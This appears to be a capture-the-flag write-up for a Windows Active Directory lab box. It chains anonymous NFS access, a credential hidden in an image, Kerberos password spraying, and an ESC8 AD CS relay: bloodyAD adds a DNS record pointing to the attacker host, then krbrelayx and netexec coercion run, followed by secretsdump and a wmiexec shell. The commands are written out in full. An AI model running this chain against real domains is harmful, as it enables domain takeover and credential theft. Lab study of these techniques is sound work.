VulnCicada
Overview
VulnCicada is a medium Windows Active Directory box built around NFS exposure and AD CS abuse. A world-readable NFS profiles share leaks a list of domain users; one profile contains an image file that hides a plaintext credential. Spraying that password (with proper Kerberos authentication against the FQDN) identifies the account owner as Rosie.Powell. From there, Certipy finds the CA is vulnerable to ESC8 — Web Enrollment is enabled without signing enforcement. Combining bloodyAD DNS record insertion, krbrelayx, and netexec coerce_plus relays the DC machine account’s Kerberos authentication to the Web Enrollment endpoint, producing a certificate that can be used to recover the Administrator NTLM hash via secretsdump.
Path: anonymous NFS → image credential → Rosie.Powell → ESC8 Kerberos relay → DC certificate → Administrator NTLM → domain admin.
Enumeration
$ nmap 10.129.235.233
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server


The scan fingerprints a Windows domain controller at cicada.vl / DC-JPQ225.cicada.vl. Two things stand out immediately: NFS on 2049 (unusual for a DC) and the standard AD CS cluster. I added both the short and FQDN to /etc/hosts.
10.129.235.233 cicada.vl DC-JPQ225.cicada.vl
SMB
$ smbclient -L \\\\cicada.vl\\

Nothing accessible anonymously.
NFS
$ showmount -e cicada.vl

$ sudo mount cicada.vl:/profiles /mnt/nfs_share/

The mounted share contains home directories for eleven accounts:
Administrator, Daniel.Marshall, Debra.Wright, Jane.Carter, Jordan.Francis,
Joyce.Andrews, Katie.Ward, Megan.Simpson, Richard.Gibbons, Rosie.Powell, Shirley.West

Foothold — Credential in NFS Image
AS-REP Roasting attempt
With a clean username list I tried AS-REP roasting first:
$ GetNPUsers.py -usersfile userlist -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.129.235.233 'cicada.vl/'

No pre-auth disabled accounts.
Image files on the share
A recursive look at the share shows that only two directories contain files: Administrator/vacation.png and Rosie.Powell/marketing.png. The Administrator image copies fine, but Rosie’s file returns Permission denied. Elevating locally with sudo chmod on the NFS-mounted path works around it:
$ sudo chmod +r /mnt/nfs_share/Rosie.Powell/marketing.png
$ cp /mnt/nfs_share/Rosie.Powell/marketing.png .

The website on port 80 offers nothing useful:

Opening marketing.png reveals embedded plaintext credentials:

Password spray
Spraying the recovered password against the user list via plain SMB produces no hits. The DC enforces Kerberos-only authentication (NTLM disabled), so the spray needs the FQDN and -k:
$ nxc smb DC-JPQ225.cicada.vl -u userlist -p "Cicada123" -d "cicada.vl" -k

Rosie.Powell is the owner of the credential.
Privilege Escalation — ESC8 via Kerberos Relay
Discovering the CA
Checking shares as Rosie reveals the AD CS infrastructure is present:
$ nxc smb DC-JPQ225.cicada.vl -u rosie.powell -p "Cicada123" -d "cicada.vl" -k --shares

Running Certipy to enumerate vulnerabilities. Kerberos errors appear with a plain DC IP; passing the FQDN as -dc-ip and specifying the nameserver resolves them:
$ certipy find -k -vulnerable -text -dc-ip DC-JPQ225.cicada.vl -no-pass -ns 10.129.235.234

The CA cicada-DC-JPQ225-CA has Web Enrollment enabled with Request Disposition: Issue and no signing enforced — the conditions for ESC8.

Kerberos relay chain
ESC8 via Kerberos relay requires three moving parts: a DNS record pointing to the attacker host, a relay listener, and a coercion trigger.
1. Add a DNS record pointing to our host (using bloodyAD since dnstool.py produced errors):
$ python3 bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p 'Cicada123' \
-k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.8
2. Start krbrelayx to relay incoming Kerberos authentication to the Web Enrollment endpoint:
$ python3 krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' \
--adcs --template DomainController -v 'CICADA'
3. Coerce DC authentication using netexec coerce_plus (PetitPotam and Coercer did not work here):
$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus \
-o LISTENER=dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA



The relay succeeds and krbrelayx saves a .pfx certificate for the DC machine account.
Root
With the DC machine account certificate, authenticate to retrieve the Administrator’s NTLM hash:

$ secretsdump.py cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -k -no-pass -just-dc-user Administrator

Pull a TGT for Administrator using the hash, then get a shell with wmiexec:
$ getTGT.py cicada.vl/Administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87 -dc-ip 10.129.235.250
$ wmiexec.py cicada.vl/Administrator@dc-jpq225.cicada.vl -k -no-pass


Takeaways
- Exposed NFS on a DC is an unusual and high-value target — world-readable profile directories can leak usernames, files, and even embedded credentials without touching SMB at all.
- ESC8 requires three coordinated steps (DNS poisoning, relay listener, coercion trigger) but
netexec coerce_plusmakes the coercion piece straightforward when PetitPotam falls short. The Kerberos-only domain environment also meant every tool needed explicit FQDN targeting and-kflags rather than NTLM.